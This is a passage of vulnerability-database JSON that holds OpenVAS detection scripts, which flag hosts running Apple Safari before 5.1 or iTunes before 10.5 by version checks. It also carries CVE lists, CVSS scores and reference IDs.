+0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:27:30"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "e3b49025dc785ac38bc3cb68e0b303aa"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "b4c2a4b2d0ef11340f06a32ba5a99466"}, {"key": "href", "hash": "4e28b7feca97a88515bab30ea46bd7a3"}, {"key": "modified", "hash": "2c104a45bc8ee43625332611b190dc40"}, {"key": "naslFamily", "hash": "0db377921f4ce762c62526131097968f"}, {"key": "pluginID", "hash": "1d642e54ded4d21a662dd27ff0bbf623"}, {"key": "published", "hash": "9b79284313cbecfba7ee9daece275486"}, {"key": "references", "hash": "100df4c554f3a5e3dde24cf0713cff40"}, {"key": "reporter", "hash": "8b3416ddddfb6b12b0926d0c42fb23e1"}, {"key": "sourceData", "hash": "18de6c9a8c4d88a597e323f96759a2f7"}, {"key": "title", "hash": "834922d12c2c5621cba47517fe4dfc01"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "a9e24d5ca4129f9f027947ab62e3637db8fec239d5d0c4847463ef6f56b8c0f8", "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:902543", "OPENVAS:802233", "OPENVAS:1361412562310802233", "OPENVAS:1361412562310802193", "OPENVAS:802193", "OPENVAS:831506", "OPENVAS:1361412562310831506", "OPENVAS:881090", "OPENVAS:870530", "OPENVAS:1361412562310881090"]}, {"type": "seebug", "idList": ["SSV:20751", "SSV:21013", "SSV:20769", "SSV:20768", "SSV:26024", "SSV:20762", "SSV:20761"]}, {"type": "nessus", "idList": ["MACOSX_SAFARI5_1.NASL", "SAFARI_5_1.NASL", "ITUNES_10_5_BANNER.NASL", "ITUNES_10_5.NASL", "SUSE_11_LIBWEBKIT-110725.NASL", "MANDRIVA_MDVSA-2011-188.NASL", "ORACLELINUX_ELSA-2012-0016.NASL", "REDHAT-RHSA-2012-0016.NASL", "SL_20120111_LIBXML2_ON_SL4_X.NASL", "DEBIAN_DSA-2394.NASL"]}, {"type": "cve", "idList": ["CVE-2011-0234", "CVE-2011-0253", "CVE-2011-0242", "CVE-2010-1383", "CVE-2011-0219", "CVE-2011-1453", "CVE-2011-0254", "CVE-2011-1462", "CVE-2011-0233", "CVE-2011-0241"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11798", "SECURITYVULNS:DOC:26666", "SECURITYVULNS:DOC:27156", "SECURITYVULNS:VULN:11974", "SECURITYVULNS:DOC:27151", "SECURITYVULNS:DOC:26755", "SECURITYVULNS:DOC:26668", "SECURITYVULNS:DOC:26756", "SECURITYVULNS:VULN:11971", "SECURITYVULNS:DOC:26669"]}, {"type": "zdi", "idList": ["ZDI-11-241", "ZDI-11-240", "ZDI-11-138", "ZDI-11-140", "ZDI-11-239", "ZDI-11-243", "ZDI-11-242"]}, {"type": "zdt", "idList": ["1337DAY-ID-22651"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SERVER/WEBKIT_XSLT_DROPPER", "MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105943"]}, {"type": "msvr", "idList": ["MSVR11-009"]}, {"type": "saint", "idList": ["SAINT:E8E10FFE061EB44A3ED40AD04B13EC24", "SAINT:92788531D3EC95DEA25C0A30FCD1E592", "SAINT:93F870242C8D8DFE6FB0218061E2532F"]}, {"type": "suse", "idList": ["SUSE-SU-2011:0857-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:17993"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2394-1:72A72"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0016"]}, {"type": "centos", "idList": ["CESA-2012:0016"]}, {"type": "ubuntu", "idList": ["USN-1334-1"]}], "modified": "2018-10-22T16:44:44"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.1\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer the reference section.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.apple.com/safari/download/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "naslFamily": "General", "pluginID": "1361412562310902543"}
{"openvas": [{"lastseen": "2017-09-04T14:19:46", "bulletinFamily": "scanner", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "modified": "2017-08-30T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902543", "id": "OPENVAS:902543", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902543);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:44:25", "bulletinFamily": "scanner", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "modified": "2018-10-20T00:00:00", "published": "2011-08-12T00:00:00", "id": "OPENVAS:1361412562310802233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802233", "title": "Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_safari_mult_vuln_july11_macosx.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802233\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-12 14:44:50 +0200 (Fri, 12 Aug 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.0.6/5.1\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer the reference section.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.0.6/5.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.apple.com/safari/download/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/MacOSX/Version\");\nif(!safVer){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"5.0.6\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:19:56", "bulletinFamily": "scanner", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "modified": "2017-09-01T00:00:00", "published": "2011-08-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802233", "id": "OPENVAS:802233", "title": "Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_safari_mult_vuln_july11_macosx.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.0.6/5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.0.6/5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(802233);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-12 14:44:50 +0200 (Fri, 12 Aug 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_require_keys(\"AppleSafari/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/MacOSX/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.0.6\nif(version_is_less(version:safVer, test_version:\"5.0.6\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:27:54", "bulletinFamily": "scanner", "description": "This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.", "modified": "2017-12-19T00:00:00", "published": "2011-10-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802193", "id": "OPENVAS:802193", "title": "Apple iTunes Multiple Vulnerabilities - Oct 11", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_itunes_mult_vuln_oct11_win.nasl 8169 2017-12-19 08:42:31Z cfischer $\n#\n# Apple iTunes Multiple Vulnerabilities - Oct 11\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code in\n the context of the user running the affected application. Failed attacks may\n cause denial of service conditions.\n Impact Level: System/Application\";\ntag_affected = \"Apple iTunes version prior to 10.5 (10.5.0.142) on Windows\";\ntag_insight = \"For more details about the vulnerabilities refer to the links given below.\";\ntag_solution = \"Upgrade to Apple Apple iTunes version 10.5 or later,\n For updates refer to http://www.apple.com/itunes/download/\";\ntag_summary = \"This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.\";\n\nif(description)\n{\n script_id(802193);\n script_version(\"$Revision: 8169 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 09:42:31 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-20 08:43:23 +0200 (Thu, 20 Oct 2011)\");\n script_cve_id(\"CVE-2011-0259\", \"CVE-2011-0200\", \"CVE-2011-3252\", \"CVE-2011-3219\",\n \"CVE-2011-0204\", \"CVE-2011-0215\", \"CVE-2010-1823\", \"CVE-2011-0164\",\n \"CVE-2011-0218\", \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\",\n \"CVE-2011-0225\", \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\",\n \"CVE-2011-0235\", \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\",\n \"CVE-2011-0253\", \"CVE-2011-0254\", \"CVE-2011-0255\", \"CVE-2011-0981\",\n \"CVE-2011-0983\", \"CVE-2011-1109\", \"CVE-2011-1114\", \"CVE-2011-1115\",\n \"CVE-2011-1117\", \"CVE-2011-1121\", \"CVE-2011-1188\", \"CVE-2011-1203\",\n \"CVE-2011-1204\", \"CVE-2011-1288\", \"CVE-2011-1293\", \"CVE-2011-1296\",\n \"CVE-2011-1440\", \"CVE-2011-1449\", \"CVE-2011-1451\", \"CVE-2011-1453\",\n \"CVE-2011-1457\", \"CVE-2011-1462\", \"CVE-2011-1797\", \"CVE-2011-2338\",\n \"CVE-2011-2339\", \"CVE-2011-2341\", \"CVE-2011-2351\", \"CVE-2011-2352\",\n \"CVE-2011-2354\", \"CVE-2011-2356\", \"CVE-2011-2359\", \"CVE-2011-2788\",\n \"CVE-2011-2790\", \"CVE-2011-2792\", \"CVE-2011-2797\", \"CVE-2011-2799\",\n \"CVE-2011-2809\", \"CVE-2011-2811\", \"CVE-2011-2813\", \"CVE-2011-2814\",\n \"CVE-2011-2815\", \"CVE-2011-2816\", \"CVE-2011-2817\", \"CVE-2011-2818\",\n \"CVE-2011-2820\", \"CVE-2011-2823\", \"CVE-2011-2827\", \"CVE-2011-2831\",\n \"CVE-2011-3232\", \"CVE-2011-3233\", \"CVE-2011-3234\", \"CVE-2011-3235\",\n \"CVE-2011-3236\", \"CVE-2011-3237\", \"CVE-2011-3238\", \"CVE-2011-3239\",\n \"CVE-2011-3241\", \"CVE-2011-3244\", \"CVE-2011-1774\");\n script_bugtraq_id(50067, 48416, 50065, 50068, 48437, 48825, 43228, 46703,\n 48842, 48843, 48844, 48820, 48845, 48846, 48847, 48823,\n 48848, 48849, 48850, 48827, 48851, 48852, 48853, 46262,\n 46614, 46785, 48854, 48824, 47604, 48855, 48856, 48857,\n 48858, 51032, 48479, 48960, 49279, 49850, 49658, 50066,\n 48840, 47029);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple iTunes Multiple Vulnerabilities - Oct 11\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4981\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/Security-announce/2011//Oct/msg00000.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 